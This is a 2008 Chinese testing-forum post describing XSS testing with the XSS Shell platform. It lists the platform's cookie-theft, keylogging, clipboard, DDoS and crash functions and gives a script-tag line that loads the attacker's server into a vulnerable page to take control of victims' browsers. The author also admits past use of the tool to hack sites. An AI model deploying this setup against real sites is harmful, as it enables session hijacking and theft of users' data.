51Testing软件测试论坛

 找回密码
 (注-册)加入51Testing

QQ登录

只需一步,快速开始

微信登录,快人一步

手机号码,快捷登录

查看: 8071|回复: 1
打印 上一主题 下一主题

xss测试步骤优化

[复制链接]

该用户从未签到

跳转到指定楼层
1#
发表于 2008-8-22 13:31:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
xss测试的一般步骤,总结了一下,尽量让xss测试的步骤简单高效一些。

测试xss一直很麻烦,一直想找个方法优化一下,经过几天的探索。终于找到了一个省时省力的方法。
首先介绍一下需要的工具。
xssshell是一个xss攻击平台。它首先需要搭建一个asp web服务器,将自身搭建起来,监听请求,
然后在xss地方,嵌入一个外部脚本文件,这个脚本文件会定期的访问xssshell服务器上的文件内容,然后执行。
这样就可以通过xssshell本身的服务,来动态的修改xss语句。(以前曾用这个黑过网站,刷过流量)
网上也有另一个xss攻击平台,是beEF,linux上的,因为搭建比较复杂,就不提了。如果需要更好的功能,可以尝试一下。
我的虚拟机是vpc,对linux的支持不好,没有办法。暂时不研究那个了。


第一步,搭建xssshell,首先下载xssshell,
官方地址  http://www.portcullis-security.com/16.php

修改默认的密码和数据库文件的路径,然后自己搭建一个简易的web服务器,可以使用net box搭建。
搭建好后,就可以访问管理员页面,查看其中的功能。

具体的功能包括

getCookie()
Get victims active cookie
getSelfHtml()
Get victim's current page HTML Code
alert(<message>)
Send message to victim
eval(<javascript code>)
Execute virtually anything in JS
prompt(<question>)
Play Truth or Dare
getKeyloggerData()
Get keylogger data
getMouseLog()
Get mouse log (every click in screen)
getClipboard()
Get clipboard data (only IE)
getInternalIP()
Get internal IP address (only Mozilla* + JVM)
checkVisitedLinks(<url list>)
Check victim's history (seperated by new line)
getPage(<Relative URL Path>)
Make a request with victim credentials
DDoS(<url>)
Distributed Denial of Service attack (use {RANDOM} in URL to avoid caching)
Crash()
Consume victim's CPU and force to crash/close.
GetLocation()
Get current URL of victim.

同时xssshell提供了一个实例程序,请参考具体的说明。


第二步,在目标xss页面中,想办法嵌入一个外部的脚本链接,也就是加入
<script src="你的xssshell.asp的网络地址"></script>,这样就可以了。

第三步,登录xssshell的后台管理页面,就可以发现,有个计算机上线了,而且还提示基本的国家标志。浏览器类型。
然后,你就可以对主机进行各种功能的请求。比如发送消息,获得cookie,执行脚本,访问网页等等操作。

第四步,此步是高级应用。使用XSSTunnel,详细功能可以参考官方的说明,可以通过xss进行一些服务请求。因为这些请求时通过xss进行的。所以,获得的权限和身份也是以对方的身份进行的。如果是网站的管理员点击了你的xss页面,那么,你就可以在本地通过xssstunnel进行一些管理员的操作。


xss测试的目的就是让开发人员相信,xss能够引起的足够危害。所以,只要达到自己的目标就可以了。
比如演示通过xss获得管理员权限,然后执行管理员操作。利用xss手机受害者的敏感信息等。到此为止就已经达到了测试的要求了,再深入就成hack了。
第一步是个一劳永逸的工作,测试的时候,主要就是在xss处嵌入脚本,然后等待受害者上线就可以了。
这样就精简了很多的流程,和一些重复的体力活。

[ 本帖最后由 sihanjishu 于 2008-8-22 13:37 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?(注-册)加入51Testing

x
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏
回复

使用道具 举报

该用户从未签到

2#
发表于 2011-5-5 10:50:21 | 只看该作者
非常感谢,无意中发现的。等有环境了就搭建看看
回复 支持 反对

使用道具 举报

本版积分规则

关闭

站长推荐上一条 /1 下一条

小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 关于我们

GMT+8, 2024-11-23 08:19 , Processed in 0.074887 second(s), 29 queries .

Powered by Discuz! X3.2

© 2001-2024 Comsenz Inc.

快速回复 返回顶部 返回列表